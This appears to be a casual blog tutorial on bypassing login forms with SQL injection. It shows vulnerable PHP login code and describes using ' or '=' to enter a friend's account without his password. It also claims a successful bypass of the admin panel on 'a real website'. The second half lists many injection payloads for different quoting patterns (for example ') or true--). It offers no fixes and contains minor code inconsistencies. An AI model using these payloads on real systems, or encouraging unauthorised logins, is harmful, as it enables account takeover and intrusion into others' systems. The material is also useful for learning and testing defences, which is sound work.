First of all, read the previous article SQL Injection Explained From Scratch so you can get this stuff better.
So today we are going to learn how we can bypass logins using SQL Injection
Now let’s get straight to the point, this is a sample login form

So innocent and simple, it simply matches the user input to the records in the database and lets the user login into his account if the record exists and if there is no match then it shows an error like “The username or password is incorrect”
It seems secure but as hackers say “Security is an illusion” so to clear this illusion lets to take a close look at the login form by checking its source code.

$username=$_POST['username'];
$passwrd=$_POST['password'];
$query="select username,pass from users where username='$username' and password='$password' limit 0,1";
$result=mysql_query($query);
$rows = mysql_fetch_array($result);
if($rows)
{
echo "Login Successful" ;
create_session();
}
else
{
Echo "Username or Password is incorrect";
}

So this is the source code of a webpage created using a programming language named PHP and it takes the user input and puts it into the SQL Query and then checks if any row exists with that value and allows you to Log in.
Wait wait…. It takes the user input and puts it into the SQL Query?
What if there is no security feature to check what the user enters and we can submit anything?
Yeah, I am talking about submitting a SQL Query and interacting with the database and this is what we call SQL Injection.
So let’s try to log in without username and password. Yeah without username and password.
First of all, let see which part of the code we need to deal with

$query="select username,password from users where username='$username' and password='$password' limit 0,1";

Let’s try to understand what this code does by breaking it into parts
1. $query=
It contains the query which is going to be processed

2. username=’$username’ and password=’$password’
It assigns the values entered by the user to username and password so it can be searched in the database.

3. select username, password from users where
It selects the two columns, username and password from a table named users of the same information (username=’$username’ and password=’$password’) provided by the user.
Confused?
Well it gets username and password from the user and then looks for columns named Username and Password in a table named “users”
Still, confused?
I told you, man…I told you to read the previous article. Please take everything I say seriously.

Hmmm so let’s take advantage of the behavior of this code i.e. it lets the user enter anything.
Look at those two red-colored single quote
username=‘$username‘
They are indicating the start and end of the value. Now let’s have some fun by adding a ‘ (single quote) to the username field as it will disturb the syntax (rules and shit bro) of the code.
When we do this we will get a like You have an error in your SQL Syntax blah! blah! blah!
With that error, we just confirmed that the code accepts commands from the user.

Now let’s say I know that a friend of mine has an account on this website with the username Chutiya but I don’t know his password but I know that this website is vulnerable to SQL Injection.
So I will enter Chutiya in the username and ‘or’ ‘=’
And boom!! I got into his account!
Don’t kill me, please…I will tell you everything.
Well, I entered ‘or’ ‘=’ which made the query to return true ummmm it told the code that the password entered by the user is correct.

So the query only matched the username Chutiya and not the password because we made it assume that the password is correct. *Like a boss*
Now following the same method one may gain admin access to a website by bypassing the Admin Panel.
Admin panel is a page of a website where the admin of the websites logs in and makes changes to the website.
In admin panel, we can try to enter admin, superuser, etc. in the username field and then again ‘or’ ‘=’ in the password field.
But you can log in without knowing the username! Just inject ‘or’ ‘=’ in both fields i.e. username and password fields.

Let me show you a real scenario, I have admin panel of a real website here:

Now lets put(inject) ‘or’ ‘=’ in both username and password field:

*Hacker Voice* I am in:

So what happened here?
Well, I confused the code to think that both username and password are correct and it gave us access as admin.
Now let’s try something else

select username,password from users where username='' or true--' and password='' or ''='' limit 0,1;

Do you see that —? When it is used to comment out something in SQL or you can say it represents the start of a comment.
Comments do not get executed and hence the query will not check if the password is correct or not.
So we talked about a code that had the following query:

$query="select username,password from users where username='$username' and password='$password' limit 0,1";

Now lets see some variations of the query and how we can inject them

Query:

select username,pass from users where username="$username" and password="$passwrd" limit 0,1;

Injections:
” or true–
” or “”=”
” or 1–
” or “x”=”

Query:

select username,pass from users where username=('$username') and password=('$passwrd') limit 0,1;

Injections:
‘) or true–
‘) or (”)=(‘
‘) or 1–
‘) or (‘x’)=(‘

Query:

select username,pass from users where username=("$username") and password=("$passwrd") limit 0,1;

Injections:
“) or true–
“) or (“”)=(”
“) or 1–
“) or (“x”)=(”

Query:

select username,pass from users where username=(('$username')) and password=(('$passwrd')) limit 0,1;

Injections:
‘)) or true–
‘)) or ((”))=((‘
‘)) or 1–
‘)) or ((‘x’))=((‘

Life is too short to explain every injection above in detail so just keep learning and you will find out how they work.

1 COMMENT

Leave a Reply